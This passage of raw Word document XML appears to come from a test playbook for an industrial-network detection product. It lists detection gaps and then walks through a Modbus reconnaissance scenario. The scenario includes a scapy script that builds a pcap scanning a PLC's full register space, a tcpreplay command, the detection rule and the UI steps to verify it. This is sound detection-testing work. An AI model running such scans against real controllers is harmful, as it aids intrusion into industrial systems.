          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DNP3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0814</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(gap) DNP3 dissector + rate rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EtherNet/IP CIP forward-open from untrusted host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EtherNet/IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0859</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(gap) CIP session origin rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PLC firmware upload via HTTP (out-of-band)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTTP/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0857</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(partial) cross-zone observed-connection edge</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3744"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Slow drift — historian poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Modbus TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T0856</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(gap) statistical baseline drift detector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Items marked (gap) are not yet caught by an explicit rule — they appear in this list so the demo flow can deliberately show what OTShield does *not* see, and so the engineering team has a prioritised capability backlog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 01  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Modbus address-space scan (reconnaissance)</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T0846 — Remote System Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MEDIUM (burst), LOW (single)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modbus TCP (TCP/502)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>An attacker who has reached the OT network — typically via a compromised engineering workstation, jump host, or VPN — needs to learn what registers and coils each PLC actually exposes. Modbus has no authentication, so the attacker simply walks the address space by issuing Read Holding Register (FC 0x03) requests for every offset 0…65535. Each invalid offset returns a Modbus exception 0x02 (Illegal Data Address). The volume of exception responses is the tell-tale signature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Generate a pcap that requests holding registers across the full 16-bit address space against PLC `10.10.2.20`. Either inject the pcap via the OTShield uploader, or replay it onto the wire with `tcpreplay`.</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scenario01_modbus_scan.py — generate the pcap</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>from scapy.all import IP, TCP, Raw, wrpcap</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>import struct, random</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SRC, DST = '10.20.0.50', '10.10.2.20'   # eng workstation -&gt; PLC</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pkts = []</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>tid = 0</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>for offset in range(0, 65535, 16):       # walk address space in 16-reg chunks</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    tid = (tid + 1) &amp; 0xFFFF</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # MBAP: tid(2) + proto(2)=0 + len(2)=6 + uid(1)=1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    mbap = struct.pack('&gt;HHHB', tid, 0, 6, 1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # PDU: fc(1)=0x03 + start(2) + qty(2)=16</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    pdu  = struct.pack('&gt;BHH', 0x03, offset, 16)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    pkt = IP(src=SRC, dst=DST)/TCP(sport=random.randint(40000,50000),</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                                   dport=502, flags='PA')/Raw(load=mbap+pdu)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    pkts.append(pkt)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>wrpcap('scenario01_scan.pcap', pkts)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>print(f'wrote {len(pkts)} probes')</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># Replay live (optional):</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>#   sudo tcpreplay -i eth1 --pps=200 scenario01_scan.pcap</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--pps=200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> so the burst is fast enough to exceed the rule's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BURST_THRESHOLD=5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> but slow enough that the lab PLC simulator (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pymodbus.server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) keeps responding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>If the PLC simulator returns *successful* responses to every offset (some lab simulators have a fully-populated map), seed it first so addresses ≥ 100 are unmapped.</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.exception_response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ExceptionResponseRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>≥ BURST_THRESHOLD (5) Modbus exception responses on the same conduit within the batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity emitted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MEDIUM (burst), else LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0846 — Remote System Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — confirm the embedded Network Topology shows a new red edge from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.20.0.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (L3) to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.2.20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (L1) with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Modbus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> label.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Anomalies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Type = COMMUNICATION_PATTERN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, search title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Exception burst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Expected count = 1 row per src→dst pair, with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>createdBy = dpi-engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Click the row, expand </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Indicators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — verify </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>rule:dpi.exception_response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exception_count:N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>protocol:MODBUS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Topology → DPI modal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the same edge — sparkline shows the spike of exception PDUs concentrated in a single time bucket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Reconnaissance never directly hurts production, but it is the precondition for every later stage of the kill chain. Catching it here is high-leverage:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Establishes the attacker's first observable foothold inside the OT network — the SOC has wall-clock evidence of dwell time starting NOW.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
